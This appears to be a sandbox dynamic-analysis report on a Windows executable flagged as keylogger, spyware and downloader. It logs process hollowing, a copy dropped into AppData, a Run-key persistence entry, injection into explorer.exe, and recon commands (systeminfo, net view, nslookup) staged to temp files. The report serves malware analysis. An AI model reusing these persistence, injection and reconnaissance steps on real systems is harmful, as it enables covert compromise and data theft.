dba40065...3ae4 | Grouped Behavior
VTI SCORE: 95/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Downloader

dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4 (SHA256)

educat.exe

Windows Exe (x86-32)

Created at 2018-11-06 11:23:00

Notifications (2/3)

The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xd50 Analysis Target High (Elevated) educat.exe "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe" -
#2 0xda4 Child Process High (Elevated) educat.exe "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe" #1
#3 0xf40 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"" #2
#5 0xf9c Child Process High (Elevated) cmd.exe cmd /C ""C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"" #3
#6 0xfa8 Child Process High (Elevated) autoclb.exe "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe" #5
#7 0xfb8 Child Process High (Elevated) autoclb.exe "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe" #6
#8 0xfd8 Child Process High (Elevated) svchost.exe C:\Windows\system32\svchost.exe #7
#9 0x5f0 Autostart Medium autoclb.exe "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe" -
#10 0x51c Child Process Medium autoclb.exe "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe" #9
#11 0x198 Child Process Medium svchost.exe C:\Windows\system32\svchost.exe #10
#12 0x834 Injection Medium explorer.exe C:\Windows\Explorer.EXE #11
#13 0xbf0 Child Process Medium cmd.exe cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#15 0x200 Child Process Medium makecab.exe makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin" #12
#17 0xbd0 Child Process Medium systeminfo.exe systeminfo.exe #13
#23 0x198 Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#25 0x978 Child Process Medium cmd.exe cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#27 0x84 Child Process Medium net.exe net view #25
#29 0x86c Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#31 0x420 Child Process Medium cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12
#33 0x114 Child Process Medium nslookup.exe nslookup 127.0.0.1 #31
#34 0xa1c Child Process Medium cmd.exe cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" #12

Behavior Information - Grouped by Category

Process #1: educat.exe
47 0
Information Value
ID #1
File Name c:\users\ciihmnxmn6ps\desktop\educat.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:36, Reason: Analysis Target
Unmonitor End Time: 00:00:49, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
Information Value
PID 0xd50
Parent PID 0x508 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xd54
0xd64
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
locale.nls 0x001d0000 0x0028dfff Memory Mapped File r False False False -
private_0x0000000000290000 0x00290000 0x0029ffff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory rw True False False -
private_0x00000000003f0000 0x003f0000 0x003f1fff Private Memory rwx True False False -
educat.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory r True False False -
private_0x00000000006b0000 0x006b0000 0x007affff Private Memory rw True False False -
private_0x00000000007b0000 0x007b0000 0x007cffff Private Memory rw True False False -
private_0x0000000000800000 0x00800000 0x0080ffff Private Memory rw True False False -
pagefile_0x0000000000810000 0x00810000 0x00990fff Pagefile Backed Memory r True False False -
pagefile_0x00000000009a0000 0x009a0000 0x01d9ffff Pagefile Backed Memory r True False False -
private_0x0000000001da0000 0x01da0000 0x01e50fff Private Memory rwx True False False -
private_0x0000000001e60000 0x01e60000 0x01ecefff Private Memory rwx True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory rw True False False -
private_0x0000000001f30000 0x01f30000 0x020a6fff Private Memory rw True False False -
pagefile_0x0000000001f30000 0x01f30000 0x01fa0fff Pagefile Backed Memory rwx True False False -
private_0x0000000001fb0000 0x01fb0000 0x02126fff Private Memory rw True False False -
private_0x00000000020b0000 0x020b0000 0x02228fff Private Memory rw True False False -
private_0x0000000002130000 0x02130000 0x022a8fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
comctl32.dll 0x74b50000 0x74be1fff Memory Mapped File rwx False False False -
version.dll 0x74bf0000 0x74bf7fff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3 Fn
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4 Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3 Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4 Fn
Open STD_INPUT_HANDLE - True 1 Fn
Open STD_OUTPUT_HANDLE - True 1 Fn
Open STD_ERROR_HANDLE - True 1 Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3 Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4 Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe os_pid = 0xda4, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1 Fn
Thread (3)
Operation Process Additional Information Success Count Logfile
Get Context c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1 Fn
Set Context c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1 Fn
Resume c:\users\ciihmnxmn6ps\desktop\educat.exe os_tid = 0xd54 True 1 Fn
Memory (2)
Operation Process Additional Information Success Count Logfile
Read C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe address = 0x7ffde008, size = 4 True 1 Fn Data
Write C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe address = 0x7ffde008, size = 4 True 1 Fn Data
Module (14)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2 Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 260 True 1 Fn
Get Filename - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 259 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7527a330 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75277580 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75279910 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7527f400 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75278b70 True 2 Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x752874f0 True 1 Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1 Fn
Map - process_name = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1 Fn
Map - process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f30000 True 1 Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1 Fn Data
Process #2: educat.exe
77 0
Information Value
ID #2
File Name c:\users\ciihmnxmn6ps\desktop\educat.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
Information Value
PID 0xda4
Parent PID 0xd50 (c:\users\ciihmnxmn6ps\desktop\educat.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xda8
0xdb0
0xdb4
0xf2c
0xf30
0xf34
0xf38
0xf3c
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0012efff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory r True False False -
cversions.2.db 0x00160000 0x00163fff Memory Mapped File r True False False -
cversions.2.db 0x00170000 0x00173fff Memory Mapped File r True False False -
propsys.dll.mui 0x00180000 0x00190fff Memory Mapped File r False False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
locale.nls 0x001e0000 0x0029dfff Memory Mapped File r False False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory rw True False False -
cversions.1.db 0x003f0000 0x003f3fff Memory Mapped File r True False False -
private_0x00000000003f0000 0x003f0000 0x003f3fff Private Memory rw True False False -
educat.exe 0x00400000 0x00512fff Memory Mapped File rwx True True False
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x0053ffff Private Memory rw True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db 0x004c0000 0x00502fff Memory Mapped File r True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db 0x00510000 0x00522fff Memory Mapped File r True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory rw True False False -
pagefile_0x0000000000540000 0x00540000 0x00540fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000550000 0x00550000 0x00550fff Pagefile Backed Memory rw True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory rw True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x00580000 0x0060afff Memory Mapped File r True False False -
private_0x0000000000630000 0x00630000 0x0072ffff Private Memory rw True False False -
pagefile_0x0000000000730000 0x00730000 0x008b7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008c0000 0x008c0000 0x00a40fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a50000 0x00a50000 0x01e4ffff Pagefile Backed Memory r True False False -
private_0x0000000001e50000 0x01e50000 0x01f4ffff Private Memory rw True False False -
private_0x0000000001f50000 0x01f50000 0x0236ffff Private Memory rw True False False -
sortdefault.nls 0x02370000 0x026a6fff Memory Mapped File r False False False -
private_0x00000000026b0000 0x026b0000 0x026effff Private Memory rw True False False -
private_0x00000000026f0000 0x026f0000 0x027effff Private Memory rw True False False -
private_0x00000000027f0000 0x027f0000 0x0282ffff Private Memory rw True False False -
private_0x0000000002830000 0x02830000 0x0292ffff Private Memory rw True False False -
private_0x0000000002930000 0x02930000 0x0296ffff Private Memory rw True False False -
private_0x0000000002970000 0x02970000 0x02a6ffff Private Memory rw True False False -
private_0x0000000002a70000 0x02a70000 0x02aaffff Private Memory rw True False False -
private_0x0000000002ab0000 0x02ab0000 0x02baffff Private Memory rw True False False -
private_0x0000000002bb0000 0x02bb0000 0x02beffff Private Memory rw True False False -
private_0x0000000002bf0000 0x02bf0000 0x02ceffff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
iertutil.dll 0x745a0000 0x74860fff Memory Mapped File rwx False False False -
urlmon.dll 0x74870000 0x749cffff Memory Mapped File rwx False False False -
propsys.dll 0x749d0000 0x74b11fff Memory Mapped File rwx False False False -
devobj.dll 0x74b20000 0x74b40fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74b90000 0x74bbefff Memory Mapped File rwx False False False -
bcrypt.dll 0x74bc0000 0x74bdafff Memory Mapped File rwx False False False -
cryptsp.dll 0x74be0000 0x74bf2fff Memory Mapped File rwx False False False -
uxtheme.dll 0x74c20000 0x74c94fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75220000 0x75255fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
clbcatq.dll 0x76820000 0x768a1fff Memory Mapped File rwx False False False -
ole32.dll 0x768b0000 0x76999fff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
setupapi.dll 0x76a90000 0x76c34fff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c90000 0x76d21fff Memory Mapped File rwx False False False -
msasn1.dll 0x76d30000 0x76d3dfff Memory Mapped File rwx False False False -
wintrust.dll 0x76d40000 0x76d81fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
crypt32.dll 0x77ab0000 0x77c24fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
private_0x000000007fea4000 0x7fea4000 0x7fea6fff Private Memory rw True False False -
private_0x000000007fea7000 0x7fea7000 0x7fea9fff Private Memory rw True False False -
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory rw True False False -
private_0x000000007fead000 0x7fead000 0x7feaffff Private Memory rw True False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 address = 0x400000, size = 462848 True 1 Fn
Modify Memory #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 address = 0x7ffde008, size = 4 True 1 Fn Data
Modify Control Flow #1: c:\users\ciihmnxmn6ps\desktop\educat.exe 0xd54 os_tid = 0xda8, address = 0x77d0aef0 True 1 Fn
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe 820.34 KB YARA Match: False
MD5: 91b1601970930900983f1b79d2b44fe1
SHA1: c7f04687b7f0550d5e8fae5b3de4d90ddaece0f1
SHA256: dba40065b6efc6ae10e26ba608817ff04bdbc976e07016d78d0b4a63492e3ae4
SSDeep: 12288:n9exub3tNiHjyKsaYCgoj34ajQGV3vrkdlNdDkkcKSop:nkuqGDCjPLtvrkJ5tcKZp
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp 0.00 KB YARA Match: False
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep: 3::
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat 0.11 KB YARA Match: False
MD5: 5bde3bfe9842073c900e183ec81c6d15
SHA1: 1be6e4197cf7d451b7174874bb962e95ffb7ed15
SHA256: d09e1f585b0bebabbf056086cec881cf03f2a5d83aeaf52144a025890cc9e886
SSDeep: 3:BeCxK6OWRNfeUR/OvG8JgU64vHXMJATkUE0QefiOvBbn:4CHRhtj87vvHXMJ2dvfien
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe 820.34 KB YARA Match: False
MD5: e0fcc4456524297ae54a4bfb046d2052
SHA1: f09d17a04a615f3454e50f1abf080374a9cff4c9
SHA256: 40bc0bac0af3ffa852bbcc5926d873ca15d6fbd458de40d1ace6de493af2262e
SSDeep: 12288:O9exub3tNiHjyKsaYCgoj34ajQGV3vrkdlNdDkkcKSop:OkuqGDCjPLtvrkJ5tcKZp
Host Behavior
File (21)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1 Fn
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3 Fn
Create C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1 Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - True 1 Fn
Create Directory C:\Users\CIIHMN~1\AppData\Local\Temp\74EE - True 1 Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\74EE.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\ True 1 Fn
Create Temp File C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp path = C:\Users\CIIHMN~1\AppData\Local\Temp\74EE True 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1 Fn
Get Info C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe type = size True 1 Fn
Read C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe size = 840024, size_out = 840024 True 1 Fn Data
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe size = 4096 True 2 Fn Data
Write C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe size = 835928 True 1 Fn Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat size = 110 True 1 Fn Data
Registry (20)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1 Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1 Fn
Open Key HKEY_USERS - True 1 Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1 Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Run - True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = 160, type = REG_NONE False 1 Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1 Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, data = 0, type = REG_NONE False 1 Fn
Write Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, size = 118, type = REG_SZ True 1 Fn
Write Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Install, size = 118, type = REG_BINARY True 1 Fn Data
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
